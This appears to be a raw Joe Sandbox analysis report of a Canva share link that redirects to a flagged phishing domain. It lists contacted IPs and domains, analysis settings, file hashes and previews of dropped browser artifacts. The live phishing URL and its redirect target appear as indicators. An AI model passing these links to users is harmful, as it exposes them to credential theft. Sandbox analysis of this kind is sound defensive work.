                                                                                                                                                              1.1.1.1
                                                                                                                                                              unknownAustralia
                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                              172.217.17.78
                                                                                                                                                              unknownUnited States
                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                              13.107.21.237
                                                                                                                                                              unknownUnited States
                                                                                                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                              13.248.245.213
                                                                                                                                                              eu-eb2.3lift.comUnited States
                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                              172.217.17.34
                                                                                                                                                              unknownUnited States
                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                              104.21.32.1
                                                                                                                                                              5igcqa810yp2rcmgvohmmeoewkmyvjbw4uvf8uaagn99durqrlobvm.birsbunh.ruUnited States
                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                              18.66.161.117
                                                                                                                                                              dh1y47vf5ttia.cloudfront.netUnited States
                                                                                                                                                              3MIT-GATEWAYSUSfalse
                                                                                                                                                              172.217.17.35
                                                                                                                                                              unknownUnited States
                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                              54.155.160.118
                                                                                                                                                              dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                              104.18.95.41
                                                                                                                                                              unknownUnited States
                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                              151.101.1.44
                                                                                                                                                              dualstack.tls13.taboola.map.fastly.netUnited States
                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                              239.255.255.250
                                                                                                                                                              unknownReserved
                                                                                                                                                              unknownunknownfalse
                                                                                                                                                              104.126.37.161
                                                                                                                                                              unknownUnited States
                                                                                                                                                              20940AKAMAI-ASN1EUfalse
                                                                                                                                                              66.235.152.156
                                                                                                                                                              adobetarget.data.adobedc.netUnited States
                                                                                                                                                              15224OMNITUREUSfalse
                                                                                                                                                              152.199.21.175
                                                                                                                                                              sni1gl.wpc.omegacdn.netUnited States
                                                                                                                                                              15133EDGECASTUSfalse
                                                                                                                                                              54.165.187.207
                                                                                                                                                              sync.srv.stackadapt.comUnited States
                                                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                                                              52.223.40.198
                                                                                                                                                              match.adsrvr.orgUnited States
                                                                                                                                                              8987AMAZONEXPANSIONGBfalse
                                                                                                                                                              67.199.150.86
                                                                                                                                                              pug-sg4c.pubmnet.comUnited States
                                                                                                                                                              3257GTT-BACKBONEGTTDEfalse
                                                                                                                                                              172.217.19.206
                                                                                                                                                              unknownUnited States
                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                              13.107.246.63
                                                                                                                                                              s-part-0035.t-0009.t-msedge.netUnited States
                                                                                                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                              20.233.12.48
                                                                                                                                                              unknownUnited States
                                                                                                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                              152.199.19.160
                                                                                                                                                              unknownUnited States
                                                                                                                                                              15133EDGECASTUSfalse
                                                                                                                                                              20.190.147.12
                                                                                                                                                              unknownUnited States
                                                                                                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                              104.18.94.41
                                                                                                                                                              challenges.cloudflare.comUnited States
                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                              151.101.2.49
                                                                                                                                                              unknownUnited States
                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                              69.173.144.139
                                                                                                                                                              unknownUnited States
                                                                                                                                                              26667RUBICONPROJECTUSfalse
                                                                                                                                                              34.255.155.228
                                                                                                                                                              unknownUnited States
                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                              40.126.53.11
                                                                                                                                                              unknownUnited States
                                                                                                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                              104.18.41.39
                                                                                                                                                              unknownUnited States
                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                              69.173.144.138
                                                                                                                                                              unknownUnited States
                                                                                                                                                              26667RUBICONPROJECTUSfalse
                                                                                                                                                              208.89.12.87
                                                                                                                                                              unknownUnited States
                                                                                                                                                              11054LIVEPERSONUSfalse
                                                                                                                                                              63.140.62.27
                                                                                                                                                              msftenterprise.sc.omtrdc.netUnited States
                                                                                                                                                              15224OMNITUREUSfalse
                                                                                                                                                              178.249.97.99
                                                                                                                                                              unknownUnited Kingdom
                                                                                                                                                              11054LIVEPERSONUSfalse
                                                                                                                                                              35.244.159.8
                                                                                                                                                              us-u.openx.netUnited States
                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                              37.252.172.123
                                                                                                                                                              unknownEuropean Union
                                                                                                                                                              29990ASN-APPNEXUSfalse
                                                                                                                                                              104.21.59.210
                                                                                                                                                              gu3.watetiona.comUnited States
                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                              188.125.88.206
                                                                                                                                                              unknownUnited Kingdom
                                                                                                                                                              10310YAHOO-1USfalse
                                                                                                                                                              54.155.137.139
                                                                                                                                                              unknownUnited States
                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                              34.249.14.47
                                                                                                                                                              unknownUnited States
                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                              13.89.178.27
                                                                                                                                                              unknownUnited States
                                                                                                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                              104.16.79.73
                                                                                                                                                              static.cloudflareinsights.comUnited States
                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                              157.240.195.35
                                                                                                                                                              star-mini.c10r.facebook.comUnited States
                                                                                                                                                              32934FACEBOOKUSfalse
                                                                                                                                                              185.89.210.46
                                                                                                                                                              ib.anycast.adnxs.comGermany
                                                                                                                                                              29990ASN-APPNEXUSfalse
                                                                                                                                                              192.132.33.68
                                                                                                                                                              bttrack.comUnited States
                                                                                                                                                              18568BIDTELLECTUSfalse
                                                                                                                                                              104.17.24.14
                                                                                                                                                              cdnjs.cloudflare.comUnited States
                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                              104.18.27.193
                                                                                                                                                              unknownUnited States
                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                              184.85.177.135
                                                                                                                                                              unknownUnited States
                                                                                                                                                              20940AKAMAI-ASN1EUfalse
                                                                                                                                                              54.191.117.1
                                                                                                                                                              unknownUnited States
                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                              184.30.21.171
                                                                                                                                                              unknownUnited States
                                                                                                                                                              16625AKAMAI-ASUSfalse
                                                                                                                                                              104.18.8.76
                                                                                                                                                              unknownUnited States
                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                              188.125.88.204
                                                                                                                                                              dcs-ups.g03.yahoodns.netUnited Kingdom
                                                                                                                                                              10310YAHOO-1USfalse
                                                                                                                                                              104.18.26.193
                                                                                                                                                              dsum-sec.casalemedia.comUnited States
                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                              104.16.103.112
                                                                                                                                                              www.canva.comUnited States
                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                              178.249.97.23
                                                                                                                                                              unknownUnited Kingdom
                                                                                                                                                              11054LIVEPERSONUSfalse
                                                                                                                                                              104.244.42.3
                                                                                                                                                              unknownUnited States
                                                                                                                                                              13414TWITTERUSfalse
                                                                                                                                                              184.30.20.187
                                                                                                                                                              unknownUnited States
                                                                                                                                                              16625AKAMAI-ASUSfalse
                                                                                                                                                              104.244.42.195
                                                                                                                                                              s.twitter.comUnited States
                                                                                                                                                              13414TWITTERUSfalse
                                                                                                                                                              20.10.16.51
                                                                                                                                                              unknownUnited States
                                                                                                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                              151.101.1.181
                                                                                                                                                              unknownUnited States
                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                              151.101.2.137
                                                                                                                                                              code.jquery.comUnited States
                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                              34.217.153.224
                                                                                                                                                              unknownUnited States
                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                              142.250.181.104
                                                                                                                                                              unknownUnited States
                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                              151.101.129.181
                                                                                                                                                              unknownUnited States
                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                              142.250.181.2
                                                                                                                                                              cm.g.doubleclick.netUnited States
                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                              142.250.181.99
                                                                                                                                                              unknownUnited States
                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                              34.120.195.249
                                                                                                                                                              o13855.ingest.sentry.ioUnited States
                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                              IP
                                                                                                                                                              192.168.2.16
                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                              Analysis ID:1574985
                                                                                                                                                              Start date and time:2024-12-13 23:14:57 +01:00
                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                              Overall analysis duration:
                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                              Report type:full
                                                                                                                                                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                              Sample URL:https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document
                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                              Number of analysed new started processes analysed:13
                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                              Technologies:
                                                                                                                                                              • EGA enabled
                                                                                                                                                              Analysis Mode:stream
                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal52.phis.win@26/213@198/590
                                                                                                                                                              • Exclude process from analysis (whitelisted): svchost.exe
                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 142.250.181.99, 172.217.17.78, 64.233.164.84, 172.217.17.46, 199.232.210.172
                                                                                                                                                              • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com
                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                              • VT rate limit hit for: https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 13 21:15:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2673
                                                                                                                                                              Entropy (8bit):3.98950082951538
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:D2593C8A627BE4F10E00A9F17A9ECF97
                                                                                                                                                              SHA1:34418B0BC4CCB36DA8244744C0A9DD77AE9EE4EA
                                                                                                                                                              SHA-256:924C700F08EA583CFC8409BD942070B291B86E62AABCBD5AD14A3B7D62C3C5FF
                                                                                                                                                              SHA-512:15FB3A51B9FEDCE244F22BA0F335EA2B91500EA053E3E2098ABA030D5DB2A9104A1248F59AEC53B1612A32960F04BF4D250F77EF9BD8597CD194028D13EF47B3
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:L..................F.@.. ...$+.,.........M..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............V.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 13 21:15:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2675
                                                                                                                                                              Entropy (8bit):4.0052531553347865
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:0A283E725403B6453F5FC27542F703A6
                                                                                                                                                              SHA1:6F51C82F14E28C7B655CFC00A2F181A49B53150E
                                                                                                                                                              SHA-256:1587467A162CD17173CDCE96405D9D252C3D6C659BDFD278225EECFA956D0180
                                                                                                                                                              SHA-512:37F4E4E1C58D2F6CC1FB4593ECAB1D64861A0F94C9AC58DDC6042BCDA8218F458BC0CE198B34F45AF6F34129063750229C03CBE18256B2F5BB049EAA300AE0E2
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:L..................F.@.. ...$+.,.........M..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............V.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2689
                                                                                                                                                              Entropy (8bit):4.0114405246536275
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:9E711EF6E2C32247FD551A42664C7D4B
                                                                                                                                                              SHA1:96E7BEDF2C758769D862276AB6C0E94BB31F4358
                                                                                                                                                              SHA-256:9C4B8529B387D7E7BED591066DB4C9DDE6A7500E4C83ED00B4BC138F3062909C
                                                                                                                                                              SHA-512:6098901AE2F03DECF9862AB177847AD9309D67B53AFC4D10B4902F590D2F9800E1791FFE2BCC592972076F651627C03E58C705D8F8203CDCB89643D5A3800E19
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............V.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 13 21:15:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2677
                                                                                                                                                              Entropy (8bit):4.001211500932907
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:9C265E2972A3C802CB73C78635D19B34
                                                                                                                                                              SHA1:0535C8638DF0D1745A9B06B9B87DCF0F992D34B4
                                                                                                                                                              SHA-256:2A13D3349552B6E198C3B30E43A8E5615845F7ECD6706C01E01118F4EB72499F
                                                                                                                                                              SHA-512:4A3619F8D02A7D9C50AFA8ADD4D0E0CFA01D27E051FB8DB05025AC38AA96F634A1D58565F8B1DE0BAE3329B5A08B5754344C527AFA766F0AE759420F84347B39
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:L..................F.@.. ...$+.,....Hu...M..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............V.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 13 21:15:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2677
                                                                                                                                                              Entropy (8bit):3.9915039729334367
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:37930EF77AA64AD7E0D2C067FA468208
                                                                                                                                                              SHA1:2C38734968A8AFCC984B9634E87E37734E48DDF4
                                                                                                                                                              SHA-256:C249B58AD62E7BC00260D5AF2CF41820544D57B3C91AA7F2AABA42ED78BB2A44
                                                                                                                                                              SHA-512:BDDEC89AAA8DE7F5F0232318069AE54A331FC5D5E0FD915ACA23640EA97269095A058D7D0E693B14A9508D2266C5FD03032E3DE1971E233D6381BBF3ADE508BB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:L..................F.@.. ...$+.,.....J...M..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............V.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 13 21:15:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2679
                                                                                                                                                              Entropy (8bit):3.999522539340225
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:D60D57324A6722AB0F5D88259F80DE4A
                                                                                                                                                              SHA1:616349096B75C9118B4B832370325C615315B4FB
                                                                                                                                                              SHA-256:72E9CF6EB8CC3FC7841EB6F0395A806AB7A89C130B5E58DF8AC3A0E69F9C38E5
                                                                                                                                                              SHA-512:437B24F4F2520A3AEEBB1FC8D1BD736A73A117CDC2D73211D6BAA202898289DE0A337B20230AA537FAAB8A5C8CE5BD0311BA4E489EEB8763B06240CE00C57177
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:L..................F.@.. ...$+.,.....t...M..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............V.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):48316
                                                                                                                                                              Entropy (8bit):5.6346993394709
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                              SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                              SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                              SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):107335
                                                                                                                                                              Entropy (8bit):7.997763760584168
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:F93A32FE57F4BB8E7C51D0070BBC247E
                                                                                                                                                              SHA1:1AA7DD07A104CE8B30A6C3DE5F12FCEBEEFBB942
                                                                                                                                                              SHA-256:FEF6192BF63E7F941521B7A2E23669CFD904B10E6A0F60628527FC9DE4526F36
                                                                                                                                                              SHA-512:CCFD19A160FA7DFC494965EC3624131E02EF2A469C11B28CD0F8A20A08377B288BB7798967F58A5799157E9B2139D66ED364F5F54F03A8ECF15CAF02D588D7D9
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/ProductOverview_PBICapabilities_1.1?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2000&qlt=95&fit=constrain"
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D................-...(iinf..........infe........av01Color....jiprp...Kipco....ispe...........&....pixi............av1C........colrnclx...........ipma..................5mdat.....*..%....B2...D$..A.P...E....qE.R...B...K.....2...5{.......U.^zu....l...Ps\.....Ec7..J.......Km<H.l..^....-=?.......f...T..-Sh;{k$......%E.H^...,......\...t.t........X".m._...3.....~..../..~/....X.J0..S....K.b.=P. ._.T.p.n..P...............^.[..s..]..qR9..E.....i..N`..@kH.beS........s..f..t..v |...;....:j.......!G...?@^.N@.;.............J..h.}....l.+P.e86.8>...qv.TZ...<r;...Y'...._...]X........5G.?..O..?....E.....\c....g......o.l.>4.0|5...q....<|.|P8j.qP.....~.~..n..gs.......S.$..e7.G.#..#.D.........y..U....I.~R..E..YvT....c.-~..woo..Tc?m...-....,l%.!.....4..._9_vD2....S.%G....'N.m_2.Fz..]8....j.wI....7.z*7E;.j"8.5w.......#.x}.Bf8.............J.+.|Ru)@..pQF...VH.9..K.%
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (526)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1683
                                                                                                                                                              Entropy (8bit):4.981226266363334
                                                                                                                                                              Encrypted:false
